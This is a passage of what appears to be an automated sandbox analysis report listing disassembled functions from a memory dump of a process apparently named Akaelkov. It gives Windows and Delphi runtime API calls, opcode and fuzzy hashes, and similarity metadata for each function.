                                                                                                    • Opcode Fuzzy Hash: 9c02093551bf3ff9bff981cabc33e5637cccf5a022bb205d5ead2f0cab047a80
                                                                                                    • Instruction Fuzzy Hash: 2FD05EA0F123844BEF00BEB064C460122E4EF00A18B0005356C09BA200C77DB859CF1E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 040AD6AB
                                                                                                    • MulDiv.KERNEL32(?,?,?), ref: 040AD6E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 170555f25b4abefc5c958aea68061aa0178de36be9c3f4aab84c3def74b5a539
                                                                                                    • Instruction ID: 57660115a31b5b5f62d34f0f5375632ba21897700c18a34d9be523804ac3bda0
                                                                                                    • Opcode Fuzzy Hash: 170555f25b4abefc5c958aea68061aa0178de36be9c3f4aab84c3def74b5a539
                                                                                                    • Instruction Fuzzy Hash: 13D17770A04A099FDB01CFB8C484AAEBBF2FF49300F148959E85AABB54D735F951CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorDesktopWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3023140981-0
                                                                                                    • Opcode ID: f9c2597fc8a39cb710f02438efc8c15cefba29feeaffbbba5de2c7ace03139ee
                                                                                                    • Instruction ID: 449e8bf389a0aaf1a6b169fb7233bf210b9c3d2d45f5c83fedfd3a25ae1bb71d
                                                                                                    • Opcode Fuzzy Hash: f9c2597fc8a39cb710f02438efc8c15cefba29feeaffbbba5de2c7ace03139ee
                                                                                                    • Instruction Fuzzy Hash: 3C915775A00201CFD700EF6AE188A5A77F5EFA4388F048494E944AB365DBB8FCD5DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetMenu.USER32(00000000), ref: 040BD800
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 040BD81D
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 040BD852
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 040BD8B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Window
                                                                                                    • String ID:
                                                                                                    • API String ID: 939306805-0
                                                                                                    • Opcode ID: 6effb8cf458df6d67ad2625eec8ee92d95e48434a9c0f6c83910d3260a743de0
                                                                                                    • Instruction ID: 2a24b97bfb2dd2a3d8035b0f6d7c0508e5331c3a63623880ae9345a7436eca1c
                                                                                                    • Opcode Fuzzy Hash: 6effb8cf458df6d67ad2625eec8ee92d95e48434a9c0f6c83910d3260a743de0
                                                                                                    • Instruction Fuzzy Hash: A2519270B043045BEB65AF788894BDAA7E5AF4034CF0444B9ACC4BF296DA78F845C7D9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0407F603
                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0407F61F
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0407F696
                                                                                                    • VariantClear.OLEAUT32(?), ref: 0407F6BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 920484758-0
                                                                                                    • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                    • Instruction ID: 3199a65c74fe308ba87df8a044d2dad4a392f4fc5c11a46cde629df331eaf50c
                                                                                                    • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                    • Instruction Fuzzy Hash: DD41D7B5E0161E9BDB61EF58C890BD9B3FCAB48618F0041D5E649F7211DA70BF808F69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0408D6EF
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0408D6FE
                                                                                                    • RtlEnterCriticalSection.NTDLL(0410A2EC), ref: 0408D743
                                                                                                    • InterlockedExchange.KERNEL32(040DAAF0,?), ref: 0408D75F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2380408948-0
                                                                                                    • Opcode ID: db34f4daf4ff74cbab724dc7fd804fa4f06141e9acb48df00b387cfd3d7112a4
                                                                                                    • Instruction ID: 279ca9c60ee559257a057460ebc75d4d97615a0ebd305f759cfd4a8abfd51b8e
                                                                                                    • Opcode Fuzzy Hash: db34f4daf4ff74cbab724dc7fd804fa4f06141e9acb48df00b387cfd3d7112a4
                                                                                                    • Instruction Fuzzy Hash: BD21A130B04644BFE700EBA8C944FA977E8EF05318F408678E841B6290E779B854CF26
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
                                                                                                    • Instruction ID: 8b76fa14a25502eb500a5419f30d5cf903099fbed463962f726278bb4aed8f4d
                                                                                                    • Opcode Fuzzy Hash: 252c6770106a75361df70907076199b145203d4218c02a64cf2bf0741655b85d
                                                                                                    • Instruction Fuzzy Hash: F301622170460CAB9774BD665C44F9B3A9DDFC6768F00843C682EAF342DA66FC25C668
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 0408A293
                                                                                                    • LoadResource.KERNEL32(?,0408A318,?,?,?,04085D70,?,00000001,00000000,?,0408A1BE,00000000,?), ref: 0408A2AD
                                                                                                    • SizeofResource.KERNEL32(?,0408A318,?,0408A318,?,?,?,04085D70,?,00000001,00000000,?,0408A1BE,00000000,?), ref: 0408A2C7
                                                                                                    • LockResource.KERNEL32(04089E88,00000000,?,0408A318,?,0408A318,?,?,?,04085D70,?,00000001,00000000,?,0408A1BE,00000000), ref: 0408A2D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                    • Instruction ID: 86340d883e1d1f223855ecb5e0152583bdb960f48c4e8377bf9cf80dd25a8771
                                                                                                    • Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                    • Instruction Fuzzy Hash: FFF062B37045046F6B44FF6CA940DAB77ECEE89278310441AF90CE7205DA36ED018775
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetEvent.KERNEL32(0410A748,0410A74C,040C4D8A), ref: 040C259A
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 040C259F
                                                                                                    • WaitForSingleObject.KERNEL32(0410A750,000000FF,0410A748,040C4D8A), ref: 040C25B4
                                                                                                    • CloseHandle.KERNEL32(0410A750,0410A748,040C4D8A), ref: 040C25BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCurrentEventHandleObjectSingleThreadWait
                                                                                                    • String ID:
                                                                                                    • API String ID: 2257156048-0
                                                                                                    • Opcode ID: f78dbc301034c25b8c83f330a8e25064dea5003f02979032dcd4fe7d51041a30
                                                                                                    • Instruction ID: 28c6296445151c93ba5ae8652fca3ec2fdddd4e333e806624017c34c66668385
                                                                                                    • Opcode Fuzzy Hash: f78dbc301034c25b8c83f330a8e25064dea5003f02979032dcd4fe7d51041a30
                                                                                                    • Instruction Fuzzy Hash: 38F01C70D007409FD754EBBAD444A5A37F4EB14398B048918A005D3180CBFEB8C0CF16
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 040914D8: RtlEnterCriticalSection.NTDLL(?), ref: 040914DC
                                                                                                    • CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,040923EC,?,00000000,04092414), ref: 04092327
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 040923C9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                                                                                    • String ID: Default
                                                                                                    • API String ID: 249151401-753088835
                                                                                                    • Opcode ID: 06c58d6f73d220a55301809dbe23c6d40ad95a179da5142166890c0f5ab95c6b
                                                                                                    • Instruction ID: c60a427da9bf8a428c627f98a2ff8d6dead61e4897c0c23bb7295a393f8a730a
                                                                                                    • Opcode Fuzzy Hash: 06c58d6f73d220a55301809dbe23c6d40ad95a179da5142166890c0f5ab95c6b
                                                                                                    • Instruction Fuzzy Hash: 1D616D30A04248EFEF01DFA8C5407DDBBF5AF49218F1488A9D840BB252D374AE45EB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7c17c319ad2af686ef2975642c6b07a159571c15d5790263037ff4287f980ccc
                                                                                                    • Instruction ID: 977bde441474637a00b5f788800df89dd00cdd0b15874689b3aa24ab7bf4af94
                                                                                                    • Opcode Fuzzy Hash: 7c17c319ad2af686ef2975642c6b07a159571c15d5790263037ff4287f980ccc
                                                                                                    • Instruction Fuzzy Hash: A6A1F972F106004BE718AA7C9C853ADB3C1DB85369F18827ED114EF3C1EB68E945839B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0407A6DA), ref: 0407A672
                                                                                                    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0407A6DA), ref: 0407A678
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DateFormatLocaleThread
                                                                                                    • String ID: yyyy
                                                                                                    • API String ID: 3303714858-3145165042
                                                                                                    • Opcode ID: 94805b61c8a8589ad842cad443bb292a989d02c3f3306741843a8478aef76327
                                                                                                    • Instruction ID: 78699dc37da326525a249bb06e8732d461622039cbace5c1334c143d498613e9
                                                                                                    • Opcode Fuzzy Hash: 94805b61c8a8589ad842cad443bb292a989d02c3f3306741843a8478aef76327
                                                                                                    • Instruction Fuzzy Hash: 7A216D75F00258AFEB50DBA4C881AEEB3E8EF08714F4144A5E905F7250D634BE40CBAA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close
                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                    • API String ID: 3535843008-4173385793
                                                                                                    • Opcode ID: 8a5622428846558c24801c5029bd4df128c85692c640a450fd64e36cd5306931
                                                                                                    • Instruction ID: 37a1352580b42ce8162c93182bf767b6be090f87a5c470c20e44d0c288b7cded
                                                                                                    • Opcode Fuzzy Hash: 8a5622428846558c24801c5029bd4df128c85692c640a450fd64e36cd5306931
                                                                                                    • Instruction Fuzzy Hash: 480152B5E40358BAEB21DF909D46FED77ECDB09B04F500061BE00FA580E6796910DB5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(?), ref: 0409ADEA
                                                                                                      • Part of subcall function 0409ACA4: GetProcAddress.KERNEL32(0410A568,00000000), ref: 0409AD23
                                                                                                    • GetSystemMetrics.USER32(?), ref: 0409ADB0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$AddressProc
                                                                                                    • String ID: GetSystemMetrics
                                                                                                    • API String ID: 1792783759-96882338
                                                                                                    • Opcode ID: fca3a15d0677eaa3db72385faec07a6504b4f3a2c13c435f2bd014f9e520fd2f
                                                                                                    • Instruction ID: 0c12e217be0c28e17afa216cb99dd6050e7fbdf1882da95b47bbe2a8c167c80f
                                                                                                    • Opcode Fuzzy Hash: fca3a15d0677eaa3db72385faec07a6504b4f3a2c13c435f2bd014f9e520fd2f
                                                                                                    • Instruction Fuzzy Hash: 9AF0CD703122C05FDF108A38D98426A35D6FB8527AB684A21A2176E1C0E5EDBC80BE11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetKeyState.USER32(00000010), ref: 040A3203
                                                                                                    • GetKeyState.USER32(00000011), ref: 040A3214
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State
                                                                                                    • String ID:
                                                                                                    • API String ID: 1649606143-3916222277
                                                                                                    • Opcode ID: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
                                                                                                    • Instruction ID: c1528fb011263922634549d23973de5e10801e08bcb8b693b89d84709fd0c724
                                                                                                    • Opcode Fuzzy Hash: e8b94229468f08648c098670f5d6776d8ac0e1124f50fdf48a83691f03f9fb1a
                                                                                                    • Instruction Fuzzy Hash: 36E09232B0074122F62279E83C003E757D14F527ACF0806AABED43A1C1E6A6392192A6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%